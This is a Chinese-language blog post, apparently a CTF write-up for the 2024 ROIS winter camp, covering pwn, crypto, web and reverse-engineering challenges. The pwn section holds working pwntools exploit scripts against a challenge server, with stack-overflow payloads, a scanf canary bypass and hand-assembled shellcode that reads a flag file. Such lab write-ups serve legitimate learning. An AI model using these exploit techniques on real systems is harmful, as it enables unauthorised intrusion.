<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>
    2024rois-wp
  </title>
  <meta name="description" content="">
  <meta name="keywords" content="">
  <meta name="author" content="s1nec-1o">
  <link rel="canonical" href="http://example.com/2024/01/17/2024rois-wp/">
  
  
  <link rel="icon" href='/img/favicon.ico'>
  
  
  
<link rel="stylesheet" href="/css/b4c95347.css">

  <script>window.i18n = {"tip-status-done":"完成","tip-status-default":"全部","tip-status-todo":"计划","tip-status-doing":"进行","tip-status-other":"其他","text-select":"选择","text-move":"移动","text-esc":"退出","January":"一月","February":"二月","March":"三月","April":"四月","May":"五月","June":"六月","July":"七月","August":"八月","September":"九月","October":"十月","November":"十一月","December":"十二月"}</script>
<meta name="generator" content="Hexo 7.0.0"></head>

<body id="app">
  <aside id="aside-box" class="left-aside">
    <div class="header">
      
<link rel="stylesheet" href="/css/61875ce9.css">

<div class="profile">
  <a class="badge" href="/">
    <span>Hi</span>
    <span>s1nec-1o</span>
  </a>
  <cosy-tooltip id="left-aside-button" placement="right">
    <span slot="content">
      <span>显示 / 隐藏 左侧导航</span>
      <cosy-short-key>[</cosy-short-key>
    </span>
    <cosy-icon>
      <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 20 20">
        <g fill="none">
          <path d="M16 4c1.104-.019 2 .896 2 2v8a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2V6a2 2 0 0 1 2-2h12zm1 2a1 1 0 0 0-1-1h-2.995v10H16a1 1 0 0 0 1-1V6zm-4.995 9V5H4.001a1 1 0 0 0-1 1v8a1 1 0 0 0 1 1h8.004z" fill="currentColor"></path>
        </g>
      </svg>
    </cosy-icon>
  </cosy-tooltip>
</div>

<script src="/js/a66044b6.js"></script>

      


<cosy-search id="post-search" placeholder="搜索">
  <div slot="short-key">
    <cosy-short-key>⌘</cosy-short-key>
    <cosy-short-key>K</cosy-short-key>
  </div>
</cosy-search>


<script>
  window.algolia = {
    appId: "R34LY1BBPU",
    SearchOnlyAPIKey: "4fd025154505a4b00fb416f52993d700"
  }
</script>


<script src="/js/5f00f278.js"></script>

    </div>
    <div class="aside-category">
      
<link rel="stylesheet" href="/css/db04a759.css">


<nav class="category-nav cosy-scrollbar">
  <ul><li data-path="archives">
        <a href="/archives">
          <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 20 20"><g fill="none"><path d="M3.5 3A1.5 1.5 0 0 0 2 4.5v4A1.5 1.5 0 0 0 3.5 10h9A1.5 1.5 0 0 0 14 8.5v-4A1.5 1.5 0 0 0 12.5 3h-9zM3 4.5a.5.5 0 0 1 .5-.5h9a.5.5 0 0 1 .5.5v4a.5.5 0 0 1-.5.5h-9a.5.5 0 0 1-.5-.5v-4zm.5 6.5A1.5 1.5 0 0 0 2 12.5v4A1.5 1.5 0 0 0 3.5 18h9a1.5 1.5 0 0 0 1.5-1.5v-4a1.5 1.5 0 0 0-1.5-1.5h-9zM3 12.5a.5.5 0 0 1 .5-.5h9a.5.5 0 0 1 .5.5v4a.5.5 0 0 1-.5.5h-9a.5.5 0 0 1-.5-.5v-4zm14-.063a2.003 2.003 0 0 1-2.5-1.937A2 2 0 0 1 16 8.563a2.005 2.005 0 0 1 1 0a2 2 0 0 1 0 3.874zM16.5 3a.5.5 0 0 1 .5.5v4.041a3.02 3.02 0 0 0-1 0V3.5a.5.5 0 0 1 .5-.5zm0 10.5c-.17 0-.337-.014-.5-.041V17.5a.5.5 0 0 0 1 0v-4.041c-.163.027-.33.041-.5.041z" fill="currentColor"></path></g></svg>
          <div class="ellipsis">归档</div>
        </a>
      </li><li data-path="cosy-roadmap">
        <a href="/cosy-roadmap">
          <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 20 20"><g fill="none"><path d="M9.384 2a1 1 0 0 0-.966.742L4.616 17H2.5a.5.5 0 0 0 0 1h15a.5.5 0 0 0 0-1h-2.116L11.582 2.742A1 1 0 0 0 10.616 2H9.384zM5.651 17l.8-3H11.5a.5.5 0 0 0 0-1H6.717l.534-2H10.5a.5.5 0 0 0 0-1H7.517l1.867-7h1.232l3.733 14H5.651z" fill="currentColor"></path></g></svg>
          <div class="ellipsis">路线图</div>
        </a>
      </li><li data-path="cosy-resume">
        <a href="/cosy-resume">
          <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 20 20"><g fill="none"><path d="M8.5 4.498a1.5 1.5 0 1 1 3 0a1.5 1.5 0 0 1-3 0zm1.5-2.5a2.5 2.5 0 0 0-2.43 3.086L5.471 4.15a1.761 1.761 0 0 0-2.317.88c-.4.882-.008 1.917.877 2.31L7 8.662v2.287l-1.877 4.645a1.75 1.75 0 0 0 3.245 1.311l1.556-3.849a.073.073 0 0 1 .028-.038a.086.086 0 0 1 .046-.012c.02 0 .035.005.046.012a.074.074 0 0 1 .028.038l1.555 3.849a1.75 1.75 0 0 0 3.245-1.311L13 10.96V8.662l2.968-1.322a1.74 1.74 0 0 0 .877-2.31a1.761 1.761 0 0 0-2.317-.88l-2.097.934a2.5 2.5 0 0 0-2.43-3.086zM4.065 5.444a.761.761 0 0 1 1-.38l3.918 1.744a2.5 2.5 0 0 0 2.034 0l3.918-1.744a.761.761 0 0 1 1 .38a.739.739 0 0 1-.373.983l-2.969 1.321a1 1 0 0 0-.593.914v2.298a1 1 0 0 0 .073.375l1.872 4.633a.75.75 0 0 1-1.39.562l-1.556-3.849c-.364-.9-1.639-.9-2.003 0l-1.555 3.85a.75.75 0 1 1-1.39-.562l1.876-4.646A1 1 0 0 0 8 10.95V8.662a1 1 0 0 0-.593-.914L4.438 6.427a.739.739 0 0 1-.373-.983z" fill="currentColor"></path></g></svg>
          <div class="ellipsis">简历</div>
        </a>
      </li><li data-path="link">
        <a href="/link">
          <svg t="1705378180027" class="icon" viewBox="-250 -250 1400 1400" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="1450" width="200" height="200"><path d="M593.94368 715.648a10.688 10.688 0 0 0-14.976 0L424.21568 870.4c-71.68 71.68-192.576 79.232-271.68 0-79.232-79.232-71.616-200 0-271.616l154.752-154.752a10.688 10.688 0 0 0 0-15.04l-52.992-52.992a10.688 10.688 0 0 0-15.04 0L84.50368 530.688a287.872 287.872 0 0 0 0 407.488 288 288 0 0 0 407.488 0l154.752-154.752a10.688 10.688 0 0 0 0-15.04l-52.736-52.736z m344.384-631.168a288.256 288.256 0 0 1 0 407.616l-154.752 154.752a10.688 10.688 0 0 1-15.04 0l-52.992-52.992a10.688 10.688 0 0 1 0-15.104l154.752-154.688c71.68-71.68 79.232-192.448 0-271.68-79.104-79.232-200-71.68-271.68 0L443.92768 307.2a10.688 10.688 0 0 1-15.04 0l-52.864-52.864a10.688 10.688 0 0 1 0-15.04l154.88-154.752a287.872 287.872 0 0 1 407.424 0z m-296.32 240.896l52.672 52.736a10.688 10.688 0 0 1 0 15.04l-301.504 301.44a10.688 10.688 0 0 1-15.04 0l-52.736-52.672a10.688 10.688 0 0 1 0-15.04l301.632-301.504a10.688 10.688 0 0 1 15.04 0z" fill="currentColor" p-id="1451"></path></svg>
          <div class="ellipsis">友链</div>
        </a>
      </li></ul>
  <ul><li class="active">
        <a href="/categories/2024ROIS%E5%86%AC%E4%BB%A4%E8%90%A5/">
          
          <div class="ellipsis">
            <span>2024ROIS冬令营</span>
          </div>
        </a>
      </li><li class="">
        <a href="/categories/Pwn%E7%9F%A5%E8%AF%86/">
          
          <div class="ellipsis">
            <span>Pwn知识</span>
          </div>
        </a>
      </li><li class="">
        <a href="/categories/%E5%B0%8F%E6%AF%94%E8%B5%9B/">
          
          <div class="ellipsis">
            <span>小比赛</span>
          </div>
        </a>
      </li><li class="">
        <a href="/categories/%E6%80%BB%E7%BB%93/">
          
          <div class="ellipsis">
            <span>总结</span>
          </div>
        </a>
      </li></ul>
</nav>


<script src="/js/118098c2.js"></script>

    </div>
    <div class="bottom">
      <cosy-tooltip id="button-preference" placement="right">
        <span slot="content">
          <span>偏好</span>
          <cosy-short-key>⌘</cosy-short-key>
          <cosy-short-key>p</cosy-short-key>
        </span>
        <cosy-icon bordered id="button-about-cosy-theme">
          <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 16 16">
            <g fill="none">
              <path d="M8 6a2 2 0 1 0 0 4a2 2 0 0 0 0-4zM7 8a1 1 0 1 1 2 0a1 1 0 0 1-2 0zm3.618-3.602a.708.708 0 0 1-.824-.567l-.26-1.416a.354.354 0 0 0-.275-.282a6.072 6.072 0 0 0-2.519 0a.354.354 0 0 0-.275.282l-.259 1.416a.71.71 0 0 1-.936.538l-1.359-.484a.355.355 0 0 0-.382.095c-.569.627-1 1.367-1.262 2.173a.352.352 0 0 0 .108.378l1.102.931a.704.704 0 0 1 0 1.076l-1.102.931a.352.352 0 0 0-.108.378A5.986 5.986 0 0 0 3.53 12.02a.355.355 0 0 0 .382.095l1.36-.484a.708.708 0 0 1 .936.538l.258 1.416c.026.14.135.252.275.281a6.075 6.075 0 0 0 2.52 0a.353.353 0 0 0 .274-.281l.26-1.416a.71.71 0 0 1 .936-.538l1.359.484c.135.048.286.01.382-.095c.569-.627 1-1.367 1.262-2.173a.352.352 0 0 0-.108-.378l-1.102-.931a.703.703 0 0 1 0-1.076l1.102-.931a.352.352 0 0 0 .108-.378A5.985 5.985 0 0 0 12.47 3.98a.355.355 0 0 0-.382-.095l-1.36.484a.71.71 0 0 1-.111.03zm-6.62.58l.937.333a1.71 1.71 0 0 0 2.255-1.3l.177-.97a5.105 5.105 0 0 1 1.265 0l.178.97a1.708 1.708 0 0 0 2.255 1.3L12 4.977c.255.334.467.698.63 1.084l-.754.637a1.704 1.704 0 0 0 0 2.604l.755.637a4.99 4.99 0 0 1-.63 1.084l-.937-.334a1.71 1.71 0 0 0-2.255 1.3l-.178.97a5.099 5.099 0 0 1-1.265 0l-.177-.97a1.708 1.708 0 0 0-2.255-1.3L4 11.023a4.987 4.987 0 0 1-.63-1.084l.754-.638a1.704 1.704 0 0 0 0-2.603l-.755-.637c.164-.386.376-.75.63-1.084z" fill="currentColor"></path>
            </g>
          </svg>
        </cosy-icon>
      </cosy-tooltip>
    </div>
  </aside>
  <main>
    
<link rel="stylesheet" href="/css/9bb9a539.css">


<div class="post-container">
  <header>
    <div class="left">
      
<link rel="stylesheet" href="/css/7d333f9e.css">

<nav class="breadcrumb">
  <section>
    <cosy-tooltip placement="bottom-left">
      <span slot="content"><span>首页</span>
        <cosy-short-key>⌘</cosy-short-key>
        <cosy-short-key>H</cosy-short-key>
      </span>
      <cosy-icon href="/">
        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 20 20">
          <g fill="none">
            <path d="M8.998 2.388a1.5 1.5 0 0 1 2.005 0l5.5 4.942A1.5 1.5 0 0 1 17 8.445V15.5a1.5 1.5 0 0 1-1.5 1.5H13a1.5 1.5 0 0 1-1.5-1.5V12a.5.5 0 0 0-.5-.5H9a.5.5 0 0 0-.5.5v3.5A1.5 1.5 0 0 1 7 17H4.5A1.5 1.5 0 0 1 3 15.5V8.445c0-.425.18-.83.498-1.115l5.5-4.942zm1.336.744a.5.5 0 0 0-.668 0l-5.5 4.942A.5.5 0 0 0 4 8.445V15.5a.5.5 0 0 0 .5.5H7a.5.5 0 0 0 .5-.5V12A1.5 1.5 0 0 1 9 10.5h2a1.5 1.5 0 0 1 1.5 1.5v3.5a.5.5 0 0 0 .5.5h2.5a.5.5 0 0 0 .5-.5V8.445a.5.5 0 0 0-.166-.371l-5.5-4.942z" fill="currentColor"></path>
          </g>
        </svg>
      </cosy-icon>
    </cosy-tooltip>
    
    
    <svg class="arrow" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 20 20">
      <g fill="none">
        <path d="M7.733 4.207a.75.75 0 0 1 1.06.026l5.001 5.25a.75.75 0 0 1 0 1.035l-5 5.25a.75.75 0 1 1-1.087-1.034L12.216 10l-4.51-4.734a.75.75 0 0 1 .027-1.06z" fill="currentColor"></path>
      </g>
    </svg>
    <a class="ellipsis" href="/categories/2024ROIS%E5%86%AC%E4%BB%A4%E8%90%A5/">
      2024ROIS冬令营
    </a>
    
    
    
    <svg class="arrow" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 20 20">
      <g fill="none">
        <path d="M7.733 4.207a.75.75 0 0 1 1.06.026l5.001 5.25a.75.75 0 0 1 0 1.035l-5 5.25a.75.75 0 1 1-1.087-1.034L12.216 10l-4.51-4.734a.75.75 0 0 1 .027-1.06z" fill="currentColor"></path>
      </g>
    </svg>
    <span class="ellipsis">
      2024rois-wp
    </span>
    
  </section>
</nav>


<script src="/js/31d6cfe0.js"></script>

    </div>
    <div class="right">
      
      <cosy-tooltip id="toc-show-button" placement="left">
        <span slot="content">
          <span>显示 / 隐藏 文章目录</span>
          <cosy-short-key>]</cosy-short-key>
        </span>
        <cosy-icon>
          <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 20 20">
            <g fill="none">
              <path d="M4 4c-1.104-.019-2 .896-2 2v8a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2H4zM3 6a1 1 0 0 1 1-1h2.995v10H4a1 1 0 0 1-1-1V6zm4.995 9V5h8.004a1 1 0 0 1 1 1v8a1 1 0 0 1-1 1H7.995z" fill="currentColor"></path>
            </g>
          </svg>
        </cosy-icon>
      </cosy-tooltip>
      
    </div>
  </header>
  <div class="content">
    <main class="cosy-scrollbar">
      <div class="article-container">
        <!-- 渲染文章内容 -->
        <article>
          <!-- 文章标题 -->
          <h1 class="post-title">2024rois-wp</h1>
          <div class="last-updated">
            上次更新: 2024-02-25 20:23:23
          </div>
          <!-- 文章 -->
          <h1 id="pwn"><a href="#pwn" class="headerlink" title="pwn"></a>pwn</h1><h2 id="tryc"><a href="#tryc" class="headerlink" title="tryc"></a>tryc</h2><p>很简单的 运行getshell</p>
<h2 id="easy-backdoor"><a href="#easy-backdoor" class="headerlink" title="easy_backdoor"></a>easy_backdoor</h2><p>很简单的栈溢出</p>
<p>程序中明显栈溢出漏洞</p>
<p>直接溢出到ret</p>
<p>然后程序中有个后门</p>
<p>就直接getshell</p>
<p><img src="https://img.hijwei.top/2/24/65ba278e5c8a3.png" alt="image-20240127213737253"></p>
<p>有个踩雷点就是要得返回这个地址</p>
<p>不然堆栈会出错就嘎嘎报错，别问我怎么知道的&#x2F;(ㄒoㄒ)&#x2F;~~</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span><span class="token operator">*</span>
sh<span class="token operator">=</span>remote<span class="token punctuation">(</span><span class="token string">'114.116.233.171'</span><span class="token punctuation">,</span><span class="token number">10002</span><span class="token punctuation">)</span>
payload<span class="token operator">=</span><span class="token number">0x20</span> <span class="token operator">*</span> <span class="token string">b'A'</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span><span class="token number">0x0004011F8</span><span class="token punctuation">)</span>  <span class="token comment">##没开保护直接绝对地址</span>
sh<span class="token punctuation">.</span>send<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>
sh<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="https://img.hijwei.top/2/24/65ba27ab825da.png" alt="image-20240127214337242"></p>
<h2 id="backdoor2"><a href="#backdoor2" class="headerlink" title="backdoor2"></a>backdoor2</h2><p>这道题也是栈溢出，但是很难看出来</p>
<p>调试就很好看出来</p>
<p>脑洞很大</p>
<p>依靠的是</p>
<p><img src="https://img.hijwei.top/2/24/65ba27acf10eb.png" alt="image-20240127214604500"></p>
<p>溢出这个.com</p>
<p><img src="https://img.hijwei.top/2/24/65ba27aeac097.png" alt="image-20240127214941320"></p>
<p><img src="https://img.hijwei.top/2/24/65ba27aff1818.png" alt="image-20240127214954283"></p>
<p>然后有溢出思路，因为溢出空间是足够的，所以可以算出刚刚好溢出到ret上是win地址(也可以试出来)</p>
<p><img src="https://img.hijwei.top/2/24/65ba27b0efc60.png" alt="image-20240127215423995"></p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
sh<span class="token operator">=</span>remote<span class="token punctuation">(</span><span class="token string">'114.116.233.171'</span><span class="token punctuation">,</span><span class="token number">10003</span><span class="token punctuation">)</span>
payload<span class="token operator">=</span><span class="token number">0x38</span> <span class="token operator">*</span> <span class="token string">b'1'</span>
sh<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>
sh<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="https://img.hijwei.top/2/24/65ba27b225630.png" alt="image-20240127215635936"></p>
<h2 id="ret2shellcode"><a href="#ret2shellcode" class="headerlink" title="ret2shellcode"></a>ret2shellcode</h2><p>这道题思路并不难，只是难构造</p>
<p><img src="https://img.hijwei.top/2/24/65ba27b2d19d5.png" alt="image-20240127215747235"></p>
<p>看程序一个注意canary以及栈可执行 之后要用到</p>
<p><img src="https://img.hijwei.top/2/24/65ba27b426dda.png" alt="image-20240127215851272"></p>
<p>看主程序有个sandbox说明是沙盒检查一下</p>
<p><img src="https://img.hijwei.top/2/24/65ba27b4af332.png" alt="image-20240127220019037"></p>
<p>这就是最恶心的地方，不让onegadget，要自己构造orw烦死人了</p>
<p>更烦人的是是scanf</p>
<p>而程序有个无限scanf，说明有栈溢出，但是又有Canary</p>
<p>因此要绕过Canary，而scanf有个特性(mc十年老玩家了)，是输入+-之类的并不会占用缓冲区，因此不会占用栈，就不会碰到Canary，就是实现了绕过</p>
<p>然后学长还在程序留了一点东西</p>
<img src="https://img.hijwei.top/2/24/65ba27b54d890.png" alt="image-20240127220332391" style="zoom: 50%;" />

<p>这样就能溢出到这个放ret上</p>
<p>然后就会在栈上执行程序</p>
<p>就可以构造orw这也是最恶心的地方</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
<span class="token comment">#sh=process('./shellcode')</span>
sh<span class="token operator">=</span>remote<span class="token punctuation">(</span><span class="token string">'114.116.233.171'</span><span class="token punctuation">,</span><span class="token number">10004</span><span class="token punctuation">)</span>
context<span class="token punctuation">.</span>log_level<span class="token operator">=</span><span class="token string">'debug'</span>
sl <span class="token operator">=</span> <span class="token keyword">lambda</span> x<span class="token punctuation">:</span>sh<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>x<span class="token punctuation">)</span>
<span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">18</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    sl<span class="token punctuation">(</span><span class="token string">b'1'</span><span class="token punctuation">)</span>





sl<span class="token punctuation">(</span><span class="token string">b'+'</span><span class="token punctuation">)</span>
sl<span class="token punctuation">(</span><span class="token string">b'+'</span><span class="token punctuation">)</span>
sl<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>u32<span class="token punctuation">(</span><span class="token string">b'\x67\x61\x6c\x66'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>   <span class="token comment">#任意值</span>
sl<span class="token punctuation">(</span><span class="token string">b'0'</span><span class="token punctuation">)</span>
sl<span class="token punctuation">(</span><span class="token string">b'4199215'</span><span class="token punctuation">)</span>
sl<span class="token punctuation">(</span><span class="token string">b'0'</span><span class="token punctuation">)</span>
sl<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>u32<span class="token punctuation">(</span><span class="token string">b'\x90\x90\x6a\x00'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>    <span class="token comment">##111111</span>
sl<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>u32<span class="token punctuation">(</span><span class="token string">b'\x68\x66\x6c\x61'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
sl<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>u32<span class="token punctuation">(</span><span class="token string">b'\x67\x48\x89\xe7'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
sl<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>u32<span class="token punctuation">(</span><span class="token string">b'\x31\xf6\x6a\x02'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
sl<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>u32<span class="token punctuation">(</span><span class="token string">b'\x58\x0f\x05\x48'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
sl<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>u32<span class="token punctuation">(</span><span class="token string">b'\x89\xc7\x48\x89'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
sl<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>u32<span class="token punctuation">(</span><span class="token string">b'\xe6\xba\x00\x01'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
sl<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>u32<span class="token punctuation">(</span><span class="token string">b'\x00\x00\x31\xc0'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
sl<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>u32<span class="token punctuation">(</span><span class="token string">b'\x0f\x05\xbf\x01'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
sl<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>u32<span class="token punctuation">(</span><span class="token string">b'\x00\x00\x00\x48'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
sl<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>u32<span class="token punctuation">(</span><span class="token string">b'\x89\xe6\x6a\x01'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
sl<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>u32<span class="token punctuation">(</span><span class="token string">b'\x58\x0f\x05\x00'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
sl<span class="token punctuation">(</span><span class="token string">b'-1'</span><span class="token punctuation">)</span>
sh<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token punctuation">)</span>
sh<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>有注释的地方需要特别注意就是这个地方是push 0，因为这个flag后面要有个\0才能读取，只能说难绷</p>
<h2 id="for1"><a href="#for1" class="headerlink" title="for1"></a>for1</h2><p>很简单</p>
<p>flag就在栈上</p>
<p>一个%n$s就有了</p>
<h2 id="for2"><a href="#for2" class="headerlink" title="for2"></a>for2</h2><p>这道题首先的思路就是连续覆盖两个栈，就可以覆盖返回地址，但是因为aslr导致栈地址不确定，因此我们要先泄露栈地址，我们发先rbp上的值与返回地址的差距为定值，因此泄露该值得到返回地址，之后再取低两位，但是这个不一定，只是比较方便，正确的应该是低四位，而低两位可以解但是可能会不通，多打几次即可</p>
<h1 id="CRYPTO"><a href="#CRYPTO" class="headerlink" title="CRYPTO"></a>CRYPTO</h1><h2 id="Matryoshka-doll"><a href="#Matryoshka-doll" class="headerlink" title="Matryoshka doll"></a>Matryoshka doll</h2><pre class="line-numbers language-c" data-language="c"><code class="language-c">\u004d\u0048\u0067\u0031\u004d\u006a\u0052\u006d\u004e\u0044\u006b\u0031\u004d\u007a\u0064\u0069\u004e\u006a\u0067\u0030\u004d\u0044\u0063\u0032\u004d\u007a\u004d\u0030\u004e\u006a\u0063\u0031\u004e\u006d\u0055\u0032\u005a\u0054\u0064\u006c\u004e\u0032\u0055\u0033\u005a\u0041\u003d\u003d<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>看名字俄罗斯套娃一看就很多层</p>
<p>然后这个是Unicode 解码之后就是</p>
<pre class="line-numbers language-none"><code class="language-none">MHg1MjRmNDk1MzdiNjg0MDc2MzM0Njc1NmU2ZTdlN2U3ZA&#x3D;&#x3D;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>后面又&#x3D;&#x3D; 是base64的特征 解码之后就是</p>
<pre class="line-numbers language-none"><code class="language-none">0x524f49537b6840763346756e6e7e7e7d<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>一看就是ASCII码</p>
<pre class="line-numbers language-none"><code class="language-none">ROIS&#123;h@v3Funn~~&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h2 id="keyboard"><a href="#keyboard" class="headerlink" title="keyboard"></a>keyboard</h2><pre class="line-numbers language-none"><code class="language-none">UWFzZSBXc0RSIHBPayBYZGZ2IElLbFAga0puIFdzRFIgUmZHeSBJS2xQIHJmZ1kgeWdCaiBXc2RSIFhkZlYgWlNRIE5qayBPTA&#x3D;&#x3D;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>一眼base64</p>
<pre class="line-numbers language-none"><code class="language-none">Qase WsDR pOk Xdfv IKlP kJn WsDR RfGy IKlP rfgY ygBj WsdR XdfV ZSQ Njk OL<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>看题目说是键盘那说明跟键盘有关</p>
<p>这串代表在键盘上围着的字母</p>
<pre class="line-numbers language-none"><code class="language-none">welcometothecamp<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>看题目说要capital</p>
<pre class="line-numbers language-none"><code class="language-none">ROIS&#123;WELCOMETOTHECAMP&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h1 id="web"><a href="#web" class="headerlink" title="web"></a>web</h1><h2 id="vue-terminal"><a href="#vue-terminal" class="headerlink" title="vue-terminal"></a>vue-terminal</h2><p><img src="https://img.hijwei.top/2/24/65ba27b6cf28e.png" alt="image-20240127221413304"></p>
<p><img src="https://img.hijwei.top/2/24/65ba27b784f6a.png" alt="image-20240127221442707"></p>
<p><img src="https://img.hijwei.top/2/24/65ba27b93b29c.png" alt="image-20240127221535997"></p>
<p><img src="https://img.hijwei.top/2/24/65ba27ba1193d.png" alt="image-20240127221600595"></p>
<p>跟着提示走就flag了</p>
<h2 id="ez-maze"><a href="#ez-maze" class="headerlink" title="ez_maze"></a>ez_maze</h2><p>鼠标放重点 按enter键 秒了</p>
<p><img src="https://img.hijwei.top/2/24/65ba27bb190e7.png" alt="image-20240127221804256"></p>
<h1 id="re"><a href="#re" class="headerlink" title="re"></a>re</h1><h2 id="Easy-Find"><a href="#Easy-Find" class="headerlink" title="Easy_Find"></a>Easy_Find</h2><p><img src="https://img.hijwei.top/2/24/65ba27bbcb81a.png" alt="image-20240127222023096"></p>
<p><img src="https://img.hijwei.top/2/24/65ba27bcbbcbf.png" alt="image-20240127222054786"></p>
<h2 id="Replacement"><a href="#Replacement" class="headerlink" title="Replacement"></a>Replacement</h2><p><img src="https://img.hijwei.top/2/24/65ba27be759bd.png" alt="image-20240127222200904"></p>
<h2 id="Easy-Crack"><a href="#Easy-Crack" class="headerlink" title="Easy_Crack"></a>Easy_Crack</h2><p>程序有个死循环 nop掉再运行就getshell</p>
<p><img src="https://img.hijwei.top/2/24/65ba27bf78d60.png" alt="image-20240127222415254"></p>
<p><img src="https://img.hijwei.top/2/24/65ba27c0a2500.png" alt="image-20240127222518650"></p>

          <div class="post-tags">
            <!-- 文章tags -->
            
          </div>
          <p class="motto">重拾纯粹的写作</p>
        </article>
        <!-- 评论 -->
        <div id="vcomments"></div>
      </div>
    </main>
    <!-- toc -->
    
    <cosy-drag-box id="toc-drag-box" trigger="left" min-width="220" uid="toc-box">
      <div class="meta-container">
        <div class="toc-wrapper cosy-scrollbar">
          <p class="catalog">
            <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 24 24">
              <g fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                <path d="M4 6h16"></path>
                <path d="M4 12h16"></path>
                <path d="M4 18h12"></path>
              </g>
            </svg>
            <span>目录</span>
          </p>
          <!-- 文章toc -->
